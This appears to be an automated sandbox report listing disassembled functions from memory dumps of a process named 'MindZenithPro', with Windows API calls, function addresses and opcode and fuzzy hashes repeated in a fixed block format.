                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CALL
                                    • API String ID: 1385522511-4196123274
                                    • Opcode ID: bbf9f65663b4ae57a79fa27f7a83ebff17e4e030b243bc2e458ed80463671bf5
                                    • Instruction ID: 0cc156ec94dc9ba9db3ca4e7cde2432cc7ccb65090518e9c2c7b77b331152329
                                    • Opcode Fuzzy Hash: bbf9f65663b4ae57a79fa27f7a83ebff17e4e030b243bc2e458ed80463671bf5
                                    • Instruction Fuzzy Hash: D8228B71608241AFC716DF14D480B2ABBF5BF89314F25895EF8868B3A1D775E981CB82
                                    Function 003C2825 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C3A5A
                                      • Part of subcall function 003CDCC0: GetInputState.USER32 ref: 003CDDA7
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003C2853
                                      • Part of subcall function 003C2F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 003C2F70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                    • String ID: $I
                                    • API String ID: 3667716007-971278176
                                    • Opcode ID: aee747a6e18f247da5172a866d6743b788ecb87aeec9653af4df03006af72ebe
                                    • Instruction ID: e4cb61f8c5e2797ece5c71425b4b3a41afb92b4f09aa432429b7b1b0d0aad00b
                                    • Opcode Fuzzy Hash: aee747a6e18f247da5172a866d6743b788ecb87aeec9653af4df03006af72ebe
                                    • Instruction Fuzzy Hash: D1E08622B0424917CA1ABB71A865F6DAB54DFD0315F40153EF503CA162CE694D488756
                                    Function 004006ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,?,W@,?,?,00000000,?,00400A57,00000000,0000000C), ref: 0040070A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: W@
                                    • API String ID: 823142352-444680253
                                    • Opcode ID: d62ae5ba53ad5aa5a44f8929f1d7b8a9e6c0fbbf3150535bcbd62a71ee0ddeb4
                                    • Instruction ID: 9844675a518162ddc40211f4d52a28e16aafb9e4c2cebf26dfd030ef0497e171
                                    • Opcode Fuzzy Hash: d62ae5ba53ad5aa5a44f8929f1d7b8a9e6c0fbbf3150535bcbd62a71ee0ddeb4
                                    • Instruction Fuzzy Hash: E2D06C3200020DBBDF129F84DD06EDA3BAAFB48714F014010BE1856020C732E821AB94
                                    Function 003DFFC0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE ref: 003E005D
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 003E006F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 4162189087-0
                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction ID: 80f21c00166408effd1aab9bf41f7c9c3b7daa584f9960dbf655cb537e33cc7c
                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                    • Instruction Fuzzy Hash: DB3116B0A00145DFC71ADF5AD480A69F7A6FF49300B2986A5E40ACB792D772EDC0CBC0
                                    Function 003C3989 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003C3A5A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: ed7aa8c65b9ad0bb24a55587e51202596718baf08e52762c7e33ae0784a43912
                                    • Instruction ID: 11647522f951c191052863dbc5a23aed16ad0a69ddb048fe36cca83b7bd745f1
                                    • Opcode Fuzzy Hash: ed7aa8c65b9ad0bb24a55587e51202596718baf08e52762c7e33ae0784a43912
                                    • Instruction Fuzzy Hash: 47316DB05043019FD721DF34D884B97BBE8BB59748F00092EE9DAC7241E7B5AA44CB96
                                    Function 003F4E95 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 003F4EE1
                                    • GetFileType.KERNELBASE(00000000), ref: 003F4EF3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: FileHandleType
                                    • String ID:
                                    • API String ID: 3000768030-0
                                    • Opcode ID: c1c1b8cfae440f689eaaa8cb0693403ca5ed63f72ffeebec43094590481880f7
                                    • Instruction ID: e20e53520c1ac32f68f5bade82826818fa10b98661376c1dd0c57f847bdc525d
                                    • Opcode Fuzzy Hash: c1c1b8cfae440f689eaaa8cb0693403ca5ed63f72ffeebec43094590481880f7
                                    • Instruction Fuzzy Hash: E211E93150474A46C7324A3E8C886337AA4BBA6374F39072AD3BAC79F1D730D882D245
                                    Function 004307EE Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                    Download Yara Rule
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,0040300B,00000000), ref: 00430816
                                    • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00430838
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                    • String ID:
                                    • API String ID: 4104817828-0
                                    • Opcode ID: 030bf6b85a33d0e955c546b250bd19c692fb8f5a98ca7d52682c424940c5f67a
                                    • Instruction ID: 18acb68f3d16a181747ff03ff43ce0b0fe44e69d3fd036cd9c75c825542dd906
                                    • Opcode Fuzzy Hash: 030bf6b85a33d0e955c546b250bd19c692fb8f5a98ca7d52682c424940c5f67a
                                    • Instruction Fuzzy Hash: D3F012B15017059BC3209F1AD9448A7FBECFF94721B40892EE89A87A21DBB4B085CB91
                                    Function 00430876 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0043103C: InterlockedExchange.KERNEL32(00D5DD78,00D5DD78), ref: 0043104C
                                      • Part of subcall function 0043103C: EnterCriticalSection.KERNEL32(00D5DD58,00000000), ref: 0043105E
                                      • Part of subcall function 0043103C: TerminateThread.KERNEL32(?,000001F6), ref: 0043106C
                                      • Part of subcall function 0043103C: WaitForSingleObject.KERNEL32(?,000003E8), ref: 0043107A
                                      • Part of subcall function 0043103C: CloseHandle.KERNEL32(?), ref: 00431089
                                      • Part of subcall function 0043103C: InterlockedExchange.KERNEL32(00D5DD78,000001F6), ref: 00431099
                                      • Part of subcall function 0043103C: LeaveCriticalSection.KERNEL32(00D5DD58), ref: 004310A0
                                    • FindCloseChangeNotification.KERNELBASE(?,?,004308E9), ref: 00430887
                                    • DeleteCriticalSection.KERNEL32(?,?,004308E9), ref: 004308AD
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 744473657-0
                                    • Opcode ID: decd6b41836c44a194b2d9cc08e3bfbecd454ff04709a11e8d011127a42a1160
                                    • Instruction ID: ba88d879b362e76c3076b80fb45596ddd0ec5ea8678b494b5f034d628f89632f
                                    • Opcode Fuzzy Hash: decd6b41836c44a194b2d9cc08e3bfbecd454ff04709a11e8d011127a42a1160
                                    • Instruction Fuzzy Hash: 43E01A36401711DFDB392F21EC4468ABBE4BF04312F24892FE49A99972CBB4E4C4CB48
                                    Function 003CB940 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 003CBD7E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID:
                                    • API String ID: 1385522511-0
                                    • Opcode ID: 831a135f4f4289ee6a70d0456ab990ab8f8c28f11a2905e380a789459398a557
                                    • Instruction ID: 0644eae5b0a6ac96013cb3f4cfcdc0a06d703c63eff64333c8faeb5b6730ab08
                                    • Opcode Fuzzy Hash: 831a135f4f4289ee6a70d0456ab990ab8f8c28f11a2905e380a789459398a557
                                    • Instruction Fuzzy Hash: A632CC75A00209EFCB21CF54C885FBAB7B9EF45314F15806AE906AB391C778ED81CB95
                                    Function 00447823 Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LoadString
                                    • String ID:
                                    • API String ID: 2948472770-0
                                    • Opcode ID: d2cb50e7c000bb96aaf78a26b3b5ac3008149c3d8ab0df336c3cbc7d136263a2
                                    • Instruction ID: b9582f75af847f2865cab465ab5aacfb24798afba768197ffbeb3a09aefb80c1
                                    • Opcode Fuzzy Hash: d2cb50e7c000bb96aaf78a26b3b5ac3008149c3d8ab0df336c3cbc7d136263a2
                                    • Instruction Fuzzy Hash: A3D17D70A04209DFDF15EF98C481DAEBBB5FF08314F14805AE905AB391EB34AE42CB95
                                    Function 003EF0E6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 42db73ecc0de1ecdc04fb06060da8985982769afaf51f79e5d10e2e368167b03
                                    • Instruction ID: f1215c6fea55031db5cd777167f779d672486f5a8dc0b9b8f8e036d7c84cd5e2
                                    • Opcode Fuzzy Hash: 42db73ecc0de1ecdc04fb06060da8985982769afaf51f79e5d10e2e368167b03
                                    • Instruction Fuzzy Hash: DC51F879A00198AFDB12CF59C840B797BB5EF85364F1A8678E9089B3D1C7B1ED42CB50
                                    Function 003C54DE Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C54A3: LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C54F0,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C54AF
                                      • Part of subcall function 003C54A3: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 003C54C1
                                      • Part of subcall function 003C54A3: FreeLibrary.KERNEL32(00000000,?,?,003C54F0,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C54D3
                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C5510
                                      • Part of subcall function 003C546C: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0040466F,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C5475
                                      • Part of subcall function 003C546C: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 003C5487
                                      • Part of subcall function 003C546C: FreeLibrary.KERNEL32(00000000,?,?,0040466F,?,?,003C5184,?,00000001,?,?,00000000), ref: 003C549A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Library$Load$AddressFreeProc
                                    • String ID:
                                    • API String ID: 2632591731-0
                                    • Opcode ID: 9d97dc0d37881bde9fe0bce183a3db6a5053b01f59addaf8426aadeafef8ab56
                                    • Instruction ID: 16113d917ca4e0beff539a6a7259df5ac39dc216fa035ed73945e9883bc9d1ea
                                    • Opcode Fuzzy Hash: 9d97dc0d37881bde9fe0bce183a3db6a5053b01f59addaf8426aadeafef8ab56
                                    • Instruction Fuzzy Hash: 7811E732600605AACB26AB25CC02FAD77A59F91712F10442EF542EA1C1EF75AE859B54
                                    Function 003F8752 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: __wsopen_s
                                    • String ID:
                                    • API String ID: 3347428461-0
                                    • Opcode ID: 7ebd72818b21d5045a9231bb2a9fde128b29923101d456c5767a2d50dfe283b4
                                    • Instruction ID: 234afa4b06dc47ec3f87c23be8a80aedb44b2bdb0dbd4c3a32d7be487ede08a2
                                    • Opcode Fuzzy Hash: 7ebd72818b21d5045a9231bb2a9fde128b29923101d456c5767a2d50dfe283b4
                                    • Instruction Fuzzy Hash: 95115E7190420EAFCF0ADF58E941A9F7BF5EF48310F114069F908AB311D631DA15CB65
                                    Function 003EE952 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8b966bfdbbc8d92c535bce2b66d1ab3563caea099a003a297bddb8637d4c20a
                                    • Instruction ID: a7a128b631d032f0d681e6fd107f0213be2cf1e0bc2fac1d93a1a6a2c70baf45
                                    • Opcode Fuzzy Hash: f8b966bfdbbc8d92c535bce2b66d1ab3563caea099a003a297bddb8637d4c20a
                                    • Instruction Fuzzy Hash: 22F0CD32501A7496DA333A279C05B7B33D89F43334F110715FA659B1D3EF78D8058695
                                    Function 003CA1D4 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID:
                                    • API String ID: 176396367-0
                                    • Opcode ID: b92296c11eb69795cd8cb7e6b3ea0ab49622d8b4e6042f092ec84d39ef71c5a1
                                    • Instruction ID: b8dc07c134417c43c5a3b8acfc67deeaafafd3de34d938472ea492a08c974808
                                    • Opcode Fuzzy Hash: b92296c11eb69795cd8cb7e6b3ea0ab49622d8b4e6042f092ec84d39ef71c5a1
                                    • Instruction Fuzzy Hash: DBF028B32017547EC7169F29CC02F66BB98EB44360F10862EFA19CF2D1DB71E5508BA0
                                    Function 0043F674 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0043F6B1
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: EnvironmentVariable
                                    • String ID:
                                    • API String ID: 1431749950-0
                                    • Opcode ID: f0f50394efa87c5a99f0ce6f37a935d301df572692fc5bbc758e331b70125a6c
                                    • Instruction ID: 705bf4303cbb05c0ff8e03e47bb31cae12fc2fced8ff7090bfcc739385d9cefc
                                    • Opcode Fuzzy Hash: f0f50394efa87c5a99f0ce6f37a935d301df572692fc5bbc758e331b70125a6c
                                    • Instruction Fuzzy Hash: 61F06D75600214AFCB05EBA5DC46D9F77A8EF49710F000055F505DF2A1DA70AE818B55
                                    Function 003F3B70 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,003E0145,?,?,00430F03,0000FFFF), ref: 003F3BA2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: ae65695fe7a7ce8cd9f14e7103c9680eb4a33ee4e75cb7151ff071b646e5de9d
                                    • Instruction ID: 4ccdc6902dd925f40859dbbc2860495ad2fb514c7ef0a1b0eac8d33d2b037664
                                    • Opcode Fuzzy Hash: ae65695fe7a7ce8cd9f14e7103c9680eb4a33ee4e75cb7151ff071b646e5de9d
                                    • Instruction Fuzzy Hash: 8FE06D31601A2DAAEA233B669D14B7A3A5CEF417A0F170161AE05AA2D1DB60CE0182E5
                                    Function 003C554C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
